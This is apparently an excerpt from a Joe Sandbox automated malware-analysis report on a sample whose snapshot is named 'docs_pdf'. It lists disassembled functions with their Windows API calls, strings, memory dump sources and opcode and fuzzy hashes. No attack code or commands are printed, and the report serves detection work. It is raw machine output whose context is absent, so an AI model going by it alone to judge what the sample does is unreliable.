                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0017725E
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001772D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 9c244378d556f5ad74ccd17d520ac94ae5a76e9dec9634b2e6909f1bef1f928e
                                                            • Instruction ID: e527fb8b1df4feb65f35355af3e6bf252fc4e128ad51d802347d3627703aa570
                                                            • Opcode Fuzzy Hash: 9c244378d556f5ad74ccd17d520ac94ae5a76e9dec9634b2e6909f1bef1f928e
                                                            • Instruction Fuzzy Hash: B0615875A00208AFDB10DFA4CC81EEE77F8EB09710F144169FA18A72E1D774AE45DBA0
                                                            Function 0014710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00147135
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0014718E
                                                            • VariantInit.OLEAUT32(?), ref: 001471A0
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 001471C0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00147213
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00147227
                                                            • VariantClear.OLEAUT32(?), ref: 0014723C
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00147249
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00147252
                                                            • VariantClear.OLEAUT32(?), ref: 00147264
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0014726F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: de8e1c64cce730bc1cb37ed0e94e4bb814c3888e5cdf601ed74ee63ef1d49ece
                                                            • Instruction ID: 09d73faea83106404c987308be2b54a9a9522da40d5662662c658652240b03d0
                                                            • Opcode Fuzzy Hash: de8e1c64cce730bc1cb37ed0e94e4bb814c3888e5cdf601ed74ee63ef1d49ece
                                                            • Instruction Fuzzy Hash: 78415135A04119AFCF14DF64D848DEEBBB9FF08354F008069F916A7661CB70A986CF90
                                                            Function 001686D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • CoInitialize.OLE32 ref: 00168718
                                                            • CoUninitialize.OLE32 ref: 00168723
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00182BEC,?), ref: 00168783
                                                            • IIDFromString.OLE32(?,?), ref: 001687F6
                                                            • VariantInit.OLEAUT32(?), ref: 00168890
                                                            • VariantClear.OLEAUT32(?), ref: 001688F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: ae3391fb86ddda8c1c2fdebee2c4928401a68af65c66c95c2f014c062b19a59c
                                                            • Instruction ID: 6a3ed775b2fa3118cea15379565cf7ab6402a6c4f393c2c7473c7d0511ab30cc
                                                            • Opcode Fuzzy Hash: ae3391fb86ddda8c1c2fdebee2c4928401a68af65c66c95c2f014c062b19a59c
                                                            • Instruction Fuzzy Hash: CD61CF716083019FD714DF24CC89B6BBBE8AF49714F104A1DF9859B291CB70ED98CBA2
                                                            Function 00165A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00165AA6
                                                            • inet_addr.WSOCK32(?,?,?), ref: 00165AEB
                                                            • gethostbyname.WSOCK32(?), ref: 00165AF7
                                                            • IcmpCreateFile.IPHLPAPI ref: 00165B05
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B75
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B8B
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00165C00
                                                            • WSACleanup.WSOCK32 ref: 00165C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: cda70373d37656c03dc4dbf69148cc989e47b65e487ea6157bcd75da86e231af
                                                            • Instruction ID: 488fa89a68b66a88019572c069d498245f5db759b6e0ad765a1b739601a6bb2c
                                                            • Opcode Fuzzy Hash: cda70373d37656c03dc4dbf69148cc989e47b65e487ea6157bcd75da86e231af
                                                            • Instruction Fuzzy Hash: C651A031604B019FD720EF24CC49B6ABBE6EF48710F148929F65ADB2A1DB70E850DB52
                                                            Function 0015B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015B73B
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0015B7B1
                                                            • GetLastError.KERNEL32 ref: 0015B7BB
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0015B828
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 11ed14f217b8d3b5f266aab04c97ced2d46d73307bbfe03c7047466dbc23b964
                                                            • Instruction ID: bbce7c493157ffdb99771afb4244ec4bed8c79fedfcf3e033e0f69294b30f63c
                                                            • Opcode Fuzzy Hash: 11ed14f217b8d3b5f266aab04c97ced2d46d73307bbfe03c7047466dbc23b964
                                                            • Instruction Fuzzy Hash: 9331A135A04208DFCB04EF64CCC5ABE77B4EF49702F144029E9259B2D2DB71994AC751
                                                            Function 00149471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001494F6
                                                            • GetDlgCtrlID.USER32 ref: 00149501
                                                            • GetParent.USER32 ref: 0014951D
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00149520
                                                            • GetDlgCtrlID.USER32(?), ref: 00149529
                                                            • GetParent.USER32(?), ref: 00149545
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00149548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 83e71aa2bf43adf2b45c15f96abfe11f2f9c39dc11c45bbbdf0aa3c6fe2d6f3e
                                                            • Instruction ID: 93ef688418755ea950dcef2b6ab12c53c4bee48316dc9ebddab3d5fe1e901953
                                                            • Opcode Fuzzy Hash: 83e71aa2bf43adf2b45c15f96abfe11f2f9c39dc11c45bbbdf0aa3c6fe2d6f3e
                                                            • Instruction Fuzzy Hash: B221C174D04208BBCF05AF64CC85DFFBB74EF49310F14012ABA61972A2DB759959DB20
                                                            Function 0014955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001495DF
                                                            • GetDlgCtrlID.USER32 ref: 001495EA
                                                            • GetParent.USER32 ref: 00149606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00149609
                                                            • GetDlgCtrlID.USER32(?), ref: 00149612
                                                            • GetParent.USER32(?), ref: 0014962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00149631
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: b5b87c8499972b4962ce7564487a2b27b16b62d28ccc7b6250fff8d5444cbdad
                                                            • Instruction ID: eaa71a718ff3e4efb995a35c35244d6aee92299ec4398fdc194ec4aebffbb44e
                                                            • Opcode Fuzzy Hash: b5b87c8499972b4962ce7564487a2b27b16b62d28ccc7b6250fff8d5444cbdad
                                                            • Instruction Fuzzy Hash: 1E21B374D40208BFDF05AB64CCC5EFFBB78EF59300F10411ABA11971A2DB75999A9A20
                                                            Function 00149645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00149651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00149666
                                                            • _wcscmp.LIBCMT ref: 00149678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001496F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
                                                            • Instruction ID: 7ce473a81698f941058402589847d5e595055e89eeb12eb1ea484432ffa319d5
                                                            • Opcode Fuzzy Hash: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
                                                            • Instruction Fuzzy Hash: E7114C7A648307BAFA092620DC0BDE7779CDB16770F210137F910A50F5FFA169D14A58
                                                            Function 00168BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00168BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00168C19
                                                            • CoUninitialize.OLE32 ref: 00168C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00168D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00168E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00182C0C), ref: 00168E84
                                                            • CoGetObject.OLE32(?,00000000,00182C0C,?), ref: 00168EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00168EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00168F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00168F4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
                                                            • Instruction ID: b60ac559921c74945d173abb7af540ccbef8a8f07ef592a990e3c7c77747be90
                                                            • Opcode Fuzzy Hash: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
                                                            • Instruction Fuzzy Hash: B0C12671208305AFC700DF64C88496BB7E9FF89748F104A6DF58A9B251DB71ED46CB62
                                                            Function 00154189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0015419D
                                                            • __swprintf.LIBCMT ref: 001541AA
                                                              • Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 001541D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 001541E0
                                                            • LockResource.KERNEL32(00000000), ref: 001541ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0015420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0015421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0015422E
                                                            • LockResource.KERNEL32(?), ref: 0015423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0015429B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
                                                            • Instruction ID: 04cf3f62dad8082f2b01837f704a173b29dc301f1da8a89eaadeca4a2a0749a9
                                                            • Opcode Fuzzy Hash: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
                                                            • Instruction Fuzzy Hash: 0A319D7160521AABDB119F60EC48ABF7BB8EF08306F004529FC25D6551D770DAD2CBA0
                                                            Function 000FFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000FFC06
                                                            • OleUninitialize.OLE32(?,00000000), ref: 000FFCA5
                                                            • UnregisterHotKey.USER32(?), ref: 000FFDFC
                                                            • DestroyWindow.USER32(?), ref: 00134A00
                                                            • FreeLibrary.KERNEL32(?), ref: 00134A65
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00134A92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 0b22caf58c37ba5679948633321cee2614b361661f8e7b4cfeb0b4712a2e5731
                                                            • Instruction ID: 3d259396526bcc8ebac1c6d66c1b1f12b21edba2d8173801c0a4f8b94ae5c93f
                                                            • Opcode Fuzzy Hash: 0b22caf58c37ba5679948633321cee2614b361661f8e7b4cfeb0b4712a2e5731
                                                            • Instruction Fuzzy Hash: B8A18B30701216CFCB29EF14C995A79F3A4BF14700F1442ADEA0AAB662DB30ED56DF94
                                                            Function 0014A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,0014AA64), ref: 0014A9A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
                                                            • Instruction ID: 2af89441c99f6832027b4ebd022f7839028d85dc7bac3dcd8a4b22f5bf7eae1e
                                                            • Opcode Fuzzy Hash: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
                                                            • Instruction Fuzzy Hash: 6991C570A40206EBDF1CDF60C481BE9FB74FF14314F928129E999A71A1DF306A99DB91
                                                            Function 000F2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 000F2EAE
                                                              • Part of subcall function 000F1DB3: GetClientRect.USER32(?,?), ref: 000F1DDC
                                                              • Part of subcall function 000F1DB3: GetWindowRect.USER32(?,?), ref: 000F1E1D
                                                              • Part of subcall function 000F1DB3: ScreenToClient.USER32(?,?), ref: 000F1E45
                                                            • GetDC.USER32 ref: 0012CF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0012CF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012CFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012CFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 0012CFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0012D04B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
                                                            • Instruction ID: b2e45d9e22c43cb5217ce1504a356cccf026f0031b2b7123a6247bda9a680f9a
                                                            • Opcode Fuzzy Hash: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
                                                            • Instruction Fuzzy Hash: 9571C531500209DFCF258F64E984AFE7BB5FF49350F244269FE559A1A6C7318C91DBA0
                                                            Function 0017C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                              • Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
                                                              • Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0017C2E4
                                                            • ImageList_EndDrag.COMCTL32 ref: 0017C2EA
                                                            • ReleaseCapture.USER32 ref: 0017C2F0
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0017C39A
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0017C3AD
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0017C48F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
